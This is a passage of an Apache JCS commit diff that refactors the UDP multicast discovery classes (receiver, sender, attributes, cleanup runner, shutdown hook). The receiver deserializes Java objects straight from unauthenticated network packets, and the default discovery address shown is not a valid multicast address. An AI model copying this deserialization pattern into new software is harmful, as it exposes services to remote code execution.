buf.append( "\n DiscoveredService" ); + buf.append( "\n CacheNames = [" + getCacheNames() + "]" ); + buf.append( "\n ServiceAddress = [" + getServiceAddress() + "]" ); + buf.append( "\n ServicePort = [" + getServicePort() + "]" ); + buf.append( "\n LastHearFromTime = [" + getLastHearFromTime() + "]" ); + return buf.toString(); + } +} Added: jakarta/jcs/trunk/src/java/org/apache/jcs/utils/discovery/DiscoveryShutdownHook.java URL: http://svn.apache.org/viewvc/jakarta/jcs/trunk/src/java/org/apache/jcs/utils/discovery/DiscoveryShutdownHook.java?rev=794825&view=auto ============================================================================== --- jakarta/jcs/trunk/src/java/org/apache/jcs/utils/discovery/DiscoveryShutdownHook.java (added) +++ jakarta/jcs/trunk/src/java/org/apache/jcs/utils/discovery/DiscoveryShutdownHook.java Thu Jul 16 20:14:42 2009 @@ -0,0 +1,50 @@ +package org.apache.jcs.utils.discovery; + +import org.apache.commons.logging.Log; +import org.apache.commons.logging.LogFactory; + +/** + * Calls shutdown on the manager when the vm is existing. On an orderly shutdown, then will result + * in the manager issuing a remove message. + * <p> + * The service is also registered with the composite cache manager to receive shutdown notification. + * <p> + * @author Aaron Smuts + */ +public class DiscoveryShutdownHook + extends Thread +{ + /** log instance */ + private static final Log log = LogFactory.getLog( DiscoveryShutdownHook.class ); + + /** service to shut down */ + private UDPDiscoveryService service; + + /** + * @param serviceArg service + */ + public DiscoveryShutdownHook( UDPDiscoveryService serviceArg ) + { + this.service = serviceArg; + } + + /** + * Just calls shutdown on the service. + */ + public void run() + { + if ( log.isInfoEnabled() ) + { + log.info( "UDP Discovery shutdown hook called." ); + } + + if ( service != null ) + { + service.shutdown(); + } + else + { + log.warn( "UDP Discovery Service was null." ); + } + } +} Added: jakarta/jcs/trunk/src/java/org/apache/jcs/utils/discovery/UDPCleanupRunner.java URL: http://svn.apache.org/viewvc/jakarta/jcs/trunk/src/java/org/apache/jcs/utils/discovery/UDPCleanupRunner.java?rev=794825&view=auto ============================================================================== --- jakarta/jcs/trunk/src/java/org/apache/jcs/utils/discovery/UDPCleanupRunner.java (added) +++ jakarta/jcs/trunk/src/java/org/apache/jcs/utils/discovery/UDPCleanupRunner.java Thu Jul 16 20:14:42 2009 @@ -0,0 +1,82 @@ +package org.apache.jcs.utils.discovery; + +import java.util.HashSet; +import java.util.Iterator; +import java.util.Set; + +import org.apache.commons.logging.Log; +import org.apache.commons.logging.LogFactory; + +/** + * This class periodically check the lastHeardFrom time on the services. + * <p> + * If they exceed the configurable limit, it removes them from the set. + * <p> + * @author Aaron Smuts + */ +public class UDPCleanupRunner + implements Runnable +{ + /** log instance */ + private static final Log log = LogFactory.getLog( UDPCleanupRunner.class ); + + /** UDP discovery service */ + private UDPDiscoveryService discoveryService; + + /** default for max idle time, in seconds */ + private static final long DEFAULT_MAX_IDLE_TIME_SECONDS = 180; + + /** The configured max idle time, in seconds */ + private long maxIdleTimeSeconds = DEFAULT_MAX_IDLE_TIME_SECONDS; + + /** + * @param service UDPDiscoveryService + */ + public UDPCleanupRunner( UDPDiscoveryService service ) + { + this.discoveryService = service; + } + + /** + * This goes through the list of services and removes those that we haven't heard from in longer + * than the max idle time. + * <p> + * @see java.lang.Runnable#run() + */ + public void run() + { + long now = System.currentTimeMillis(); + + // iterate through the set + // it is thread safe + // http://gee.cs.oswego.edu/dl/classes/EDU/oswego/cs/dl/util/concurrent/CopyOnWriteArraySet. + // html + // TODO this should get a copy. you can't simply remove from this. + // the listeners need to be notified. + Iterator it = discoveryService.getDiscoveredServices().iterator(); + + Set toRemove = new HashSet(); + // can't remove via the iterator. must remove directly + while ( it.hasNext() ) + { + DiscoveredService service = (DiscoveredService) it.next(); + if ( ( now - service.getLastHearFromTime() ) > ( maxIdleTimeSeconds * 1000 ) ) + { + if ( log.isInfoEnabled() ) + { + log.info( "Removing service, since we haven't heard from it in " + maxIdleTimeSeconds + + " seconds. service = " + service ); + } + toRemove.add( service ); + } + } + + // remove the bad ones + Iterator toRemoveIt = toRemove.iterator(); + while ( toRemoveIt.hasNext() ) + { + // call this so the listeners get notified + discoveryService.removeDiscoveredService( (DiscoveredService) toRemoveIt.next() ); + } + } +} Added: jakarta/jcs/trunk/src/java/org/apache/jcs/utils/discovery/UDPDiscoveryAttributes.java URL: http://svn.apache.org/viewvc/jakarta/jcs/trunk/src/java/org/apache/jcs/utils/discovery/UDPDiscoveryAttributes.java?rev=794825&view=auto ============================================================================== --- jakarta/jcs/trunk/src/java/org/apache/jcs/utils/discovery/UDPDiscoveryAttributes.java (added) +++ jakarta/jcs/trunk/src/java/org/apache/jcs/utils/discovery/UDPDiscoveryAttributes.java Thu Jul 16 20:14:42 2009 @@ -0,0 +1,210 @@ +package org.apache.jcs.utils.discovery; + +/** + * Configuration properties for UDP discover service. + * <p> + * The service will allow out applications to find each other. + * <p> + * @author Aaron Smuts + */ +public class UDPDiscoveryAttributes + implements Cloneable +{ + /** service name */ + private String serviceName; + + /** service address */ + private String serviceAddress; + + /** service port */ + private int servicePort; + + /** + * false -> this service instance is not ready to receive requests. true -> ready for use + */ + private boolean isDark; + + /** default udp discovery address */ + private static final String DEFAULT_UDP_DISCOVERY_ADDRESS = "161.129.204.104"; + + /** default udp discovery port */ + private static final int DEFAULT_UDP_DISCOVERY_PORT = 5678; + + /** udp discovery address */ + private String udpDiscoveryAddr = DEFAULT_UDP_DISCOVERY_ADDRESS; + + /** udp discovery port */ + private int udpDiscoveryPort = DEFAULT_UDP_DISCOVERY_PORT; + + /** default delay between sending passive broadcasts */ + private static final int DEFAULT_SEND_DELAY_SEC = 60; + + /** delay between sending passive broadcasts */ + private int sendDelaySec = DEFAULT_SEND_DELAY_SEC; + + /** default amount of time before we remove services that we haven't heard from */ + private static final int DEFAULT_MAX_IDLE_TIME_SEC = 180; + + /** amount of time before we remove services that we haven't heard from */ + private int maxIdleTimeSec = DEFAULT_MAX_IDLE_TIME_SEC; + + /** + * @param serviceName The serviceName to set. + */ + public void setServiceName( String serviceName ) + { + this.serviceName = serviceName; + } + + /** + * @return Returns the serviceName. + */ + public String getServiceName() + { + return serviceName; + } + + /** + * @param serviceAddress The serviceAddress to set. + */ + public void setServiceAddress( String serviceAddress ) + { + this.serviceAddress = serviceAddress; + } + + /** + * @return Returns the serviceAddress. + */ + public String getServiceAddress() + { + return serviceAddress; + } + + /** + * @param servicePort The servicePort to set. + */ + public void setServicePort( int servicePort ) + { + this.servicePort = servicePort; + } + + /** + * @return Returns the servicePort. + */ + public int getServicePort() + { + return servicePort; + } + + /** + * @param udpDiscoveryAddr The udpDiscoveryAddr to set. + */ + public void setUdpDiscoveryAddr( String udpDiscoveryAddr ) + { + this.udpDiscoveryAddr = udpDiscoveryAddr; + } + + /** + * @return Returns the udpDiscoveryAddr. + */ + public String getUdpDiscoveryAddr() + { + return udpDiscoveryAddr; + } + + /** + * @param udpDiscoveryPort The udpDiscoveryPort to set. + */ + public void setUdpDiscoveryPort( int udpDiscoveryPort ) + { + this.udpDiscoveryPort = udpDiscoveryPort; + } + + /** + * @return Returns the udpDiscoveryPort. + */ + public int getUdpDiscoveryPort() + { + return udpDiscoveryPort; + } + + /** + * @param sendDelaySec The sendDelaySec to set. + */ + public void setSendDelaySec( int sendDelaySec ) + { + this.sendDelaySec = sendDelaySec; + } + + /** + * @return Returns the sendDelaySec. + */ + public int getSendDelaySec() + { + return sendDelaySec; + } + + /** + * @param maxIdleTimeSec The maxIdleTimeSec to set. + */ + public void setMaxIdleTimeSec( int maxIdleTimeSec ) + { + this.maxIdleTimeSec = maxIdleTimeSec; + } + + /** + * @return Returns the maxIdleTimeSec. + */ + public int getMaxIdleTimeSec() + { + return maxIdleTimeSec; + } + + /** + * @return Returns the isDark. + */ + public boolean isDark() + { + return isDark; + } + + /** + * @param isDark The isDark to set. + */ + public void setDark( boolean isDark ) + { + this.isDark = isDark; + } + + /** @return a clone of this object */ + public Object clone() + { + UDPDiscoveryAttributes attributes = new UDPDiscoveryAttributes(); + attributes.setSendDelaySec( this.getSendDelaySec() ); + attributes.setMaxIdleTimeSec( this.getMaxIdleTimeSec() ); + attributes.setServiceName( this.getServiceName() ); + attributes.setServicePort( this.getServicePort() ); + attributes.setUdpDiscoveryAddr( this.getUdpDiscoveryAddr() ); + attributes.setUdpDiscoveryPort( this.getUdpDiscoveryPort() ); + attributes.setDark( this.isDark() ); + return attributes; + } + + /** + * @return string for debugging purposes. + */ + public String toString() + { + StringBuffer buf = new StringBuffer(); + buf.append( "\n UDPDiscoveryAttributes" ); + buf.append( "\n ServiceName = [" + getServiceName() + "]" ); + buf.append( "\n ServiceAddress = [" + getServiceAddress() + "]" ); + buf.append( "\n ServicePort = [" + getServicePort() + "]" ); + buf.append( "\n UdpDiscoveryAddr = [" + getUdpDiscoveryAddr() + "]" ); + buf.append( "\n UdpDiscoveryPort = [" + getUdpDiscoveryPort() + "]" ); + buf.append( "\n SendDelaySec = [" + getSendDelaySec() + "]" ); + buf.append( "\n MaxIdleTimeSec = [" + getMaxIdleTimeSec() + "]" ); + buf.append( "\n IsDark = [" + isDark() + "]" ); + return buf.toString(); + } +} Added: jakarta/jcs/trunk/src/java/org/apache/jcs/utils/discovery/UDPDiscoveryInfo.java URL: http://svn.apache.org/viewvc/jakarta/jcs/trunk/src/java/org/apache/jcs/utils/discovery/UDPDiscoveryInfo.java?rev=794825&view=auto ============================================================================== --- jakarta/jcs/trunk/src/java/org/apache/jcs/utils/discovery/UDPDiscoveryInfo.java (added) +++ jakarta/jcs/trunk/src/java/org/apache/jcs/utils/discovery/UDPDiscoveryInfo.java Thu Jul 16 20:14:42 2009 @@ -0,0 +1,21 @@ +package org.apache.jcs.utils.discovery; + +import java.rmi.dgc.VMID; + +/** + * Provides info for the udp discovery service. + * <p> + * @author Aaron Smuts + */ +public class UDPDiscoveryInfo +{ + /** + * jvm unique identifier. + */ + protected static VMID vmid = new VMID(); + + /** + * Identifies the listener, so we don't add ourselves to the list of known services. + */ + public static long listenerId = vmid.hashCode(); +} Copied: jakarta/jcs/trunk/src/java/org/apache/jcs/utils/discovery/UDPDiscoveryManager.java (from r781592, jakarta/jcs/trunk/src/java/org/apache/jcs/auxiliary/lateral/socket/tcp/discovery/UDPDiscoveryManager.java) URL: http://svn.apache.org/viewvc/jakarta/jcs/trunk/src/java/org/apache/jcs/utils/discovery/UDPDiscoveryManager.java?p2=jakarta/jcs/trunk/src/java/org/apache/jcs/utils/discovery/UDPDiscoveryManager.java&p1=jakarta/jcs/trunk/src/java/org/apache/jcs/auxiliary/lateral/socket/tcp/discovery/UDPDiscoveryManager.java&r1=781592&r2=794825&rev=794825&view=diff ============================================================================== --- jakarta/jcs/trunk/src/java/org/apache/jcs/auxiliary/lateral/socket/tcp/discovery/UDPDiscoveryManager.java (original) +++ jakarta/jcs/trunk/src/java/org/apache/jcs/utils/discovery/UDPDiscoveryManager.java Thu Jul 16 20:14:42 2009 @@ -1,4 +1,4 @@ -package org.apache.jcs.auxiliary.lateral.socket.tcp.discovery; +package org.apache.jcs.utils.discovery; /* * Licensed to the Apache Software Foundation (ASF) under one @@ -24,9 +24,9 @@ import org.apache.commons.logging.Log; import org.apache.commons.logging.LogFactory; -import org.apache.jcs.auxiliary.lateral.socket.tcp.behavior.ITCPLateralCacheAttributes; import org.apache.jcs.engine.behavior.ICompositeCacheManager; import org.apache.jcs.engine.behavior.IElementSerializer; +import org.apache.jcs.engine.behavior.IShutdownObservable; import org.apache.jcs.engine.logging.behavior.ICacheEventLogger; /** @@ -63,31 +63,10 @@ } /** - * Returns the UDP Discovery service associated with this instance. - * <p> - * @param lca ITCPLateralCacheAttributes - * @param cacheMgr - * @param cacheEventLogger - * @param elementSerializer - * @return instance for this address - */ - public synchronized UDPDiscoveryService getService( ITCPLateralCacheAttributes lca, - ICompositeCacheManager cacheMgr, - ICacheEventLogger cacheEventLogger, - IElementSerializer elementSerializer ) - { - UDPDiscoveryService service = getService( lca.getUdpDiscoveryAddr(), lca.getUdpDiscoveryPort(), lca - .getTcpListenerPort(), cacheMgr, cacheEventLogger, elementSerializer ); - - // TODO find a way to remote these attributes from the service, the manager needs it on disocvery. - service.setTcpLateralCacheAttributes( lca ); - return service; - } - - /** * Creates a service for the address and port if one doesn't exist already. * <p> - * TODO we may need to key this using the listener port too + * We need to key this using the listener port too. TODO think of making one discovery service + * work for mutliple types of clients. * <p> * @param discoveryAddress * @param discoveryPort @@ -97,23 +76,29 @@ * @param elementSerializer * @return UDPDiscoveryService */ - private synchronized UDPDiscoveryService getService( String discoveryAddress, int discoveryPort, int servicePort, - ICompositeCacheManager cacheMgr, - ICacheEventLogger cacheEventLogger, - IElementSerializer elementSerializer ) + public synchronized UDPDiscoveryService getService( String discoveryAddress, int discoveryPort, int servicePort, + ICompositeCacheManager cacheMgr, + ICacheEventLogger cacheEventLogger, + IElementSerializer elementSerializer ) { - String key = discoveryAddress + ":" + discoveryPort; + String key = discoveryAddress + ":" + discoveryPort + ":" + servicePort; UDPDiscoveryService service = (UDPDiscoveryService) services.get( key ); if ( service == null ) { if ( log.isInfoEnabled() ) { - log.info( "Creating service for address:port [" + key + "]" ); + log.info( "Creating service for address:port:servicePort [" + key + "]" ); } - service = new UDPDiscoveryService( discoveryAddress, discoveryPort, servicePort, cacheMgr, - cacheEventLogger, elementSerializer ); + UDPDiscoveryAttributes attributes = new UDPDiscoveryAttributes(); + attributes.setUdpDiscoveryAddr( discoveryAddress ); + attributes.setUdpDiscoveryPort( discoveryPort ); + attributes.setServicePort( servicePort ); + + service = new UDPDiscoveryService( attributes, cacheEventLogger ); + ( (IShutdownObservable) cacheMgr ).registerShutdownObserver( service ); + services.put( key, service ); } Propchange: jakarta/jcs/trunk/src/java/org/apache/jcs/utils/discovery/UDPDiscoveryManager.java ------------------------------------------------------------------------------ cvs2svn:cvs-rev = 1.2 Propchange: jakarta/jcs/trunk/src/java/org/apache/jcs/utils/discovery/UDPDiscoveryManager.java ------------------------------------------------------------------------------ svn:eol-style = native Propchange: jakarta/jcs/trunk/src/java/org/apache/jcs/utils/discovery/UDPDiscoveryManager.java ------------------------------------------------------------------------------ svn:keywords = Author Date Id Revision Propchange: jakarta/jcs/trunk/src/java/org/apache/jcs/utils/discovery/UDPDiscoveryManager.java ------------------------------------------------------------------------------ svn:mergeinfo = Copied: jakarta/jcs/trunk/src/java/org/apache/jcs/utils/discovery/UDPDiscoveryMessage.java (from r781592, jakarta/jcs/trunk/src/java/org/apache/jcs/auxiliary/lateral/socket/tcp/discovery/UDPDiscoveryMessage.java) URL: http://svn.apache.org/viewvc/jakarta/jcs/trunk/src/java/org/apache/jcs/utils/discovery/UDPDiscoveryMessage.java?p2=jakarta/jcs/trunk/src/java/org/apache/jcs/utils/discovery/UDPDiscoveryMessage.java&p1=jakarta/jcs/trunk/src/java/org/apache/jcs/auxiliary/lateral/socket/tcp/discovery/UDPDiscoveryMessage.java&r1=781592&r2=794825&rev=794825&view=diff ============================================================================== --- jakarta/jcs/trunk/src/java/org/apache/jcs/auxiliary/lateral/socket/tcp/discovery/UDPDiscoveryMessage.java (original) +++ jakarta/jcs/trunk/src/java/org/apache/jcs/utils/discovery/UDPDiscoveryMessage.java Thu Jul 16 20:14:42 2009 @@ -1,4 +1,4 @@ -package org.apache.jcs.auxiliary.lateral.socket.tcp.discovery; +package org.apache.jcs.utils.discovery; /* * Licensed to the Apache Software Foundation (ASF) under one @@ -30,7 +30,7 @@ implements Serializable { /** Don't change */ - private static final long serialVersionUID = -5332377899560951794L; + private static final long serialVersionUID = -5332377899560951793L; /** * This is the periodic broadcast of a servers location. This type of message is also sent in @@ -42,6 +42,11 @@ * This asks recipients to broadcast their location. This is used on startup. */ public static final int REQUEST_BROADCAST = 1; + + /** + * This message instructs the receiver to remove this service from its list. + */ + public static final int REMOVE_BROADCAST = 2; /** The message type */ private int messageType = PASSIVE_BROADCAST; @@ -57,7 +62,7 @@ /** Names of regions */ private ArrayList cacheNames = new ArrayList(); - + /** * @param port The port to set. */ @@ -137,7 +142,7 @@ { return cacheNames; } - + /** * @return debugging string */ @@ -148,7 +153,6 @@ buf.append( "\n port = [" + port + "]" ); buf.append( "\n requesterId = [" + requesterId + "]" ); buf.append( "\n messageType = [" + messageType + "]" ); - buf.append( "\n Cache Names" ); Iterator it = cacheNames.iterator(); while ( it.hasNext() ) Propchange: jakarta/jcs/trunk/src/java/org/apache/jcs/utils/discovery/UDPDiscoveryMessage.java ------------------------------------------------------------------------------ cvs2svn:cvs-rev = 1.2 Propchange: jakarta/jcs/trunk/src/java/org/apache/jcs/utils/discovery/UDPDiscoveryMessage.java ------------------------------------------------------------------------------ svn:eol-style = native Propchange: jakarta/jcs/trunk/src/java/org/apache/jcs/utils/discovery/UDPDiscoveryMessage.java ------------------------------------------------------------------------------ svn:keywords = Author Date Id Revision Propchange: jakarta/jcs/trunk/src/java/org/apache/jcs/utils/discovery/UDPDiscoveryMessage.java ------------------------------------------------------------------------------ svn:mergeinfo = Copied: jakarta/jcs/trunk/src/java/org/apache/jcs/utils/discovery/UDPDiscoveryReceiver.java (from r792552, jakarta/jcs/trunk/src/java/org/apache/jcs/auxiliary/lateral/socket/tcp/discovery/UDPDiscoveryReceiver.java) URL: http://svn.apache.org/viewvc/jakarta/jcs/trunk/src/java/org/apache/jcs/utils/discovery/UDPDiscoveryReceiver.java?p2=jakarta/jcs/trunk/src/java/org/apache/jcs/utils/discovery/UDPDiscoveryReceiver.java&p1=jakarta/jcs/trunk/src/java/org/apache/jcs/auxiliary/lateral/socket/tcp/discovery/UDPDiscoveryReceiver.java&r1=792552&r2=794825&rev=794825&view=diff ============================================================================== --- jakarta/jcs/trunk/src/java/org/apache/jcs/auxiliary/lateral/socket/tcp/discovery/UDPDiscoveryReceiver.java (original) +++ jakarta/jcs/trunk/src/java/org/apache/jcs/utils/discovery/UDPDiscoveryReceiver.java Thu Jul 16 20:14:42 2009 @@ -1,4 +1,4 @@ -package org.apache.jcs.auxiliary.lateral.socket.tcp.discovery; +package org.apache.jcs.utils.discovery; /* * Licensed to the Apache Software Foundation (ASF) under one @@ -25,22 +25,11 @@ import java.net.DatagramPacket; import java.net.InetAddress; import java.net.MulticastSocket; -import java.util.ArrayList; -import java.util.Iterator; import org.apache.commons.logging.Log; import org.apache.commons.logging.LogFactory; -import org.apache.jcs.auxiliary.lateral.LateralCacheAttributes; import org.apache.jcs.auxiliary.lateral.LateralCacheInfo; -import org.apache.jcs.auxiliary.lateral.LateralCacheNoWait; -import org.apache.jcs.auxiliary.lateral.socket.tcp.LateralTCPCacheManager; -import org.apache.jcs.auxiliary.lateral.socket.tcp.TCPLateralCacheAttributes; -import org.apache.jcs.auxiliary.lateral.socket.tcp.behavior.ITCPLateralCacheAttributes; -import org.apache.jcs.engine.behavior.ICache; -import org.apache.jcs.engine.behavior.ICompositeCacheManager; -import org.apache.jcs.engine.behavior.IElementSerializer; import org.apache.jcs.engine.behavior.IShutdownObserver; -import org.apache.jcs.engine.logging.behavior.ICacheEventLogger; import EDU.oswego.cs.dl.util.concurrent.BoundedBuffer; import EDU.oswego.cs.dl.util.concurrent.PooledExecutor; @@ -54,16 +43,16 @@ private final static Log log = LogFactory.getLog( UDPDiscoveryReceiver.class ); /** buffer */ - private final byte[] m_buffer = new byte[65536]; + private final byte[] mBuffer = new byte[65536]; /** The socket used for communication. */ - private MulticastSocket m_socket; + private MulticastSocket mSocket; /** * TODO: Consider using the threadpool manager to get this thread pool. For now place a tight * restriction on the pool size */ - private static final int maxPoolSize = 10; + private static final int maxPoolSize = 2; /** The processor */ private PooledExecutor pooledExecutor = null; @@ -80,18 +69,9 @@ /** The port */ private int multicastPort = 0; - /** The cache manager. */ - private ICompositeCacheManager cacheMgr; - /** Is it shutdown. */ private boolean shutdown = false; - /** The event logger. */ - protected ICacheEventLogger cacheEventLogger; - - /** The serializer. */ - protected IElementSerializer elementSerializer; - /** * Constructor for the LateralUDPReceiver object. * <p> @@ -100,32 +80,24 @@ * @param service * @param multicastAddressString * @param multicastPort - * @param cacheMgr - * @param cacheEventLogger - * @param elementSerializer * @exception IOException */ - public UDPDiscoveryReceiver( UDPDiscoveryService service, String multicastAddressString, int multicastPort, - ICompositeCacheManager cacheMgr, ICacheEventLogger cacheEventLogger, - IElementSerializer elementSerializer ) + public UDPDiscoveryReceiver( UDPDiscoveryService service, String multicastAddressString, int multicastPort ) throws IOException { this.service = service; this.multicastAddressString = multicastAddressString; this.multicastPort = multicastPort; - this.cacheMgr = cacheMgr; - this.cacheEventLogger = cacheEventLogger; - this.elementSerializer = elementSerializer; - // create a small thread pool to handle a barage + // create a small thread pool to handle a barrage pooledExecutor = new PooledExecutor( new BoundedBuffer( 100 ), maxPoolSize ); pooledExecutor.discardOldestWhenBlocked(); - //pooledExecutor.setMinimumPoolSize(1); + pooledExecutor.setMinimumPoolSize(1); pooledExecutor.setThreadFactory( new MyThreadFactory() ); if ( log.isInfoEnabled() ) { - log.info( "constructing listener, [" + this.multicastAddressString + ":" + this.multicastPort + "]" ); + log.info( "Constructing listener, [" + this.multicastAddressString + ":" + this.multicastPort + "]" ); } try @@ -134,7 +106,7 @@ } catch ( IOException ioe ) { - // consider eatign this so we can go on, or constructing the socket + // consider eating this so we can go on, or constructing the socket // later throw ioe; } @@ -142,6 +114,7 @@ /** * Creates the socket for this class. + * <p> * @param multicastAddressString * @param multicastPort * @throws IOException @@ -151,8 +124,8 @@ { try { - m_socket = new MulticastSocket( multicastPort ); - m_socket.joinGroup( InetAddress.getByName( multicastAddressString ) ); + mSocket = new MulticastSocket( multicastPort ); + mSocket.joinGroup( InetAddress.getByName( multicastAddressString ) ); } catch ( IOException e ) { @@ -162,27 +135,37 @@ } /** - * Highly unreliable. If it is processing one message while another comes in , the second - * message is lost. This is for low concurency peppering. + * Highly unreliable. If it is processing one message while another comes in, the second + * message is lost. This is for low concurrency peppering. + * <p> * @return the object message * @throws IOException */ public Object waitForMessage() throws IOException { - final DatagramPacket packet = new DatagramPacket( m_buffer, m_buffer.length ); + final DatagramPacket packet = new DatagramPacket( mBuffer, mBuffer.length ); Object obj = null; try { - m_socket.receive( packet ); + mSocket.receive( packet ); - final ByteArrayInputStream byteStream = new ByteArrayInputStream( m_buffer, 0, packet.getLength() ); + if ( log.isDebugEnabled() ) + { + log.debug( "Received packet from address [" + packet.getSocketAddress() + "]" ); + } + + final ByteArrayInputStream byteStream = new ByteArrayInputStream( mBuffer, 0, packet.getLength() ); final ObjectInputStream objectStream = new ObjectInputStream( byteStream ); obj = objectStream.readObject(); - + + if ( log.isDebugEnabled() ) + { + log.debug( "Read object from address [" + packet.getSocketAddress() + "], object=[" + obj + "]" ); + } } catch ( Exception e ) { @@ -275,7 +258,7 @@ public class MessageHandler implements Runnable { - /** The message to handle. Passed in during construction. */ + /** The message to handle. Passed in during construction. */ private UDPDiscoveryMessage message = null; /** @@ -296,92 +279,64 @@ { if ( log.isDebugEnabled() ) { - log.debug( "from self" ); + log.debug( "Ignoring message sent from self" ); } } else { if ( log.isDebugEnabled() ) { - log.debug( "from another" ); + log.debug( "Process message sent from another" ); log.debug( "Message = " + message ); } - // if this is a request message, have the service handle it and - // return - if ( message.getMessageType() == UDPDiscoveryMessage.REQUEST_BROADCAST ) + if ( message.getHost() == null || message.getCacheNames() == null || message.getCacheNames().isEmpty() ) { if ( log.isDebugEnabled() ) { - log.debug( "Message is a Request Broadcase, will have the service handle it." ); + log.debug( "Ignoring invalid message: " + message ); } - service.serviceRequestBroadcast(); - return; } - - try + else { - // get a cache and add it to the no waits - // the add method should not add the same. - // we need the listener port from the original config. - ITCPLateralCacheAttributes lca = null; - if ( service.getTcpLateralCacheAttributes() != null ) - { - lca = (ITCPLateralCacheAttributes) service.getTcpLateralCacheAttributes().copy(); - } - else - { - lca = new TCPLateralCacheAttributes(); - } - lca.setTransmissionType( LateralCacheAttributes.TCP ); - lca.setTcpServer( message.getHost() + ":" + message.getPort() ); - LateralTCPCacheManager lcm = LateralTCPCacheManager.getInstance( lca, cacheMgr, cacheEventLogger, - elementSerializer ); - - ArrayList regions = message.getCacheNames(); - if ( regions != null ) - { - // for each region get the cache - Iterator it = regions.iterator(); - while ( it.hasNext() ) - { - String cacheName = (String) it.next(); + processMessage(); + } + } + } - try - { - ICache ic = lcm.getCache( cacheName ); - - if ( log.isDebugEnabled() ) - { - log.debug( "Got cache, ic = " + ic ); - } - - // add this to the nowaits for this cachename - if ( ic != null ) - { - service.addNoWait( (LateralCacheNoWait) ic ); - if ( log.isDebugEnabled() ) - { - log.debug( "Called addNoWait for cacheName " + cacheName ); - } - } - } - catch ( Exception e ) - { - log.error( "Problem creating no wait", e ); - } - } - // end while - } - else - { - log.warn( "No cache names found in message " + message ); - } + /** + * Process the incoming message. + */ + private void processMessage() + { + DiscoveredService discoveredService = new DiscoveredService(); + discoveredService.setServiceAddress( message.getHost() ); + discoveredService.setCacheNames( message.getCacheNames() ); + discoveredService.setServicePort( message.getPort() ); + discoveredService.setLastHearFromTime( System.currentTimeMillis() ); + + // if this is a request message, have the service handle it and + // return + if ( message.getMessageType() == UDPDiscoveryMessage.REQUEST_BROADCAST ) + { + if ( log.isDebugEnabled() ) + { + log.debug( "Message is a Request Broadcase, will have the service handle it." ); } - catch ( Exception e ) + service.serviceRequestBroadcast(); + return; + } + else if ( message.getMessageType() == UDPDiscoveryMessage.REMOVE_BROADCAST ) + { + if ( log.isDebugEnabled() ) { - log.error( "Problem getting lateral maanger", e ); + log.debug( "Removing service from set " + discoveredService ); } + service.removeDiscoveredService( discoveredService ); + } + else + { + service.addOrUpdateService( discoveredService ); } } } @@ -415,7 +370,7 @@ try { shutdown = true; - m_socket.close(); + mSocket.close(); pooledExecutor.shutdownNow(); } catch ( Exception e ) @@ -424,4 +379,3 @@ } } } -// end class Propchange: jakarta/jcs/trunk/src/java/org/apache/jcs/utils/discovery/UDPDiscoveryReceiver.java ------------------------------------------------------------------------------ cvs2svn:cvs-rev = 1.3 Propchange: jakarta/jcs/trunk/src/java/org/apache/jcs/utils/discovery/UDPDiscoveryReceiver.java ------------------------------------------------------------------------------ svn:eol-style = native Propchange: jakarta/jcs/trunk/src/java/org/apache/jcs/utils/discovery/UDPDiscoveryReceiver.java ------------------------------------------------------------------------------ svn:keywords = Author Date Id Revision Propchange: jakarta/jcs/trunk/src/java/org/apache/jcs/utils/discovery/UDPDiscoveryReceiver.java ------------------------------------------------------------------------------ svn:mergeinfo = Copied: jakarta/jcs/trunk/src/java/org/apache/jcs/utils/discovery/UDPDiscoverySender.java (from r781592, jakarta/jcs/trunk/src/java/org/apache/jcs/auxiliary/lateral/socket/tcp/discovery/UDPDiscoverySender.java) URL: http://svn.apache.org/viewvc/jakarta/jcs/trunk/src/java/org/apache/jcs/utils/discovery/UDPDiscoverySender.java?p2=jakarta/jcs/trunk/src/java/org/apache/jcs/utils/discovery/UDPDiscoverySender.java&p1=jakarta/jcs/trunk/src/java/org/apache/jcs/auxiliary/lateral/socket/tcp/discovery/UDPDiscoverySender.java&r1=781592&r2=794825&rev=794825&view=diff ============================================================================== --- jakarta/jcs/trunk/src/java/org/apache/jcs/auxiliary/lateral/socket/tcp/discovery/UDPDiscoverySender.java (original) +++ jakarta/jcs/trunk/src/java/org/apache/jcs/utils/discovery/UDPDiscoverySender.java Thu Jul 16 20:14:42 2009 @@ -1,4 +1,4 @@ -package org.apache.jcs.auxiliary.lateral.socket.tcp.discovery; +package org.apache.jcs.utils.discovery; /* * Licensed to the Apache Software Foundation (ASF) under one @@ -42,13 +42,13 @@ private final static Log log = LogFactory.getLog( UDPDiscoverySender.class ); /** The socket */ - private MulticastSocket m_localSocket; + private MulticastSocket localSocket; /** The address */ - private InetAddress m_multicastAddress; + private InetAddress multicastAddress; /** The port */ - private int m_multicastPort; + private int multicastPort; /** * Constructor for the UDPDiscoverySender object @@ -56,6 +56,7 @@ * This sender can be used to send multiple messages. * <p> * When you are done sending, you should destroy the socket sender. + * <p> * @param host * @param port * @exception IOException @@ -65,10 +66,14 @@ { try { - m_localSocket = new MulticastSocket(); + if ( log.isInfoEnabled() ) + { + log.info( "Constructing socket for sender." ); + } + localSocket = new MulticastSocket(); // Remote address. - m_multicastAddress = InetAddress.getByName( host ); + multicastAddress = InetAddress.getByName( host ); } catch ( IOException e ) { @@ -77,7 +82,7 @@ throw e; } - m_multicastPort = port; + multicastPort = port; } /** @@ -87,11 +92,9 @@ { try { - // TODO when we move to jdk 1.4 reinstate the isClosed check - if ( this.m_localSocket != null ) - // && !this.m_localSocket.isClosed() ) + if ( this.localSocket != null && !this.localSocket.isClosed() ) { - this.m_localSocket.close(); + this.localSocket.close(); } } catch ( Exception e ) @@ -102,6 +105,7 @@ /** * Just being careful about closing the socket. + * <p> * @throws Throwable */ public void finalize() @@ -113,27 +117,27 @@ /** * Send messages. + * <p> * @param message * @throws IOException */ public void send( UDPDiscoveryMessage message ) throws IOException { - if ( this.m_localSocket == null ) + if ( this.localSocket == null ) { throw new IOException( "Socket is null, cannot send message." ); } - // TODO when we move to jdk 1.4 reinstate the isClosed check - // if (this.m_localSocket.isClosed() ) - // { - // throw new IOException( "Socket is closed, cannot send message." ); - // } + if ( this.localSocket.isClosed() ) + { + throw new IOException( "Socket is closed, cannot send message." ); + } if ( log.isDebugEnabled() ) { - log.debug( "sending UDPDiscoveryMessage, message = " + message ); - } + log.debug( "sending UDPDiscoveryMessage, address [" + multicastAddress + "], port [" + multicastPort + + "], message = " + message ); } try { @@ -145,9 +149,14 @@ final byte[] bytes = byteStream.getBytes(); // put the byte array in a packet - final DatagramPacket packet = new DatagramPacket( bytes, bytes.length, m_multicastAddress, m_multicastPort ); + final DatagramPacket packet = new DatagramPacket( bytes, bytes.length, multicastAddress, 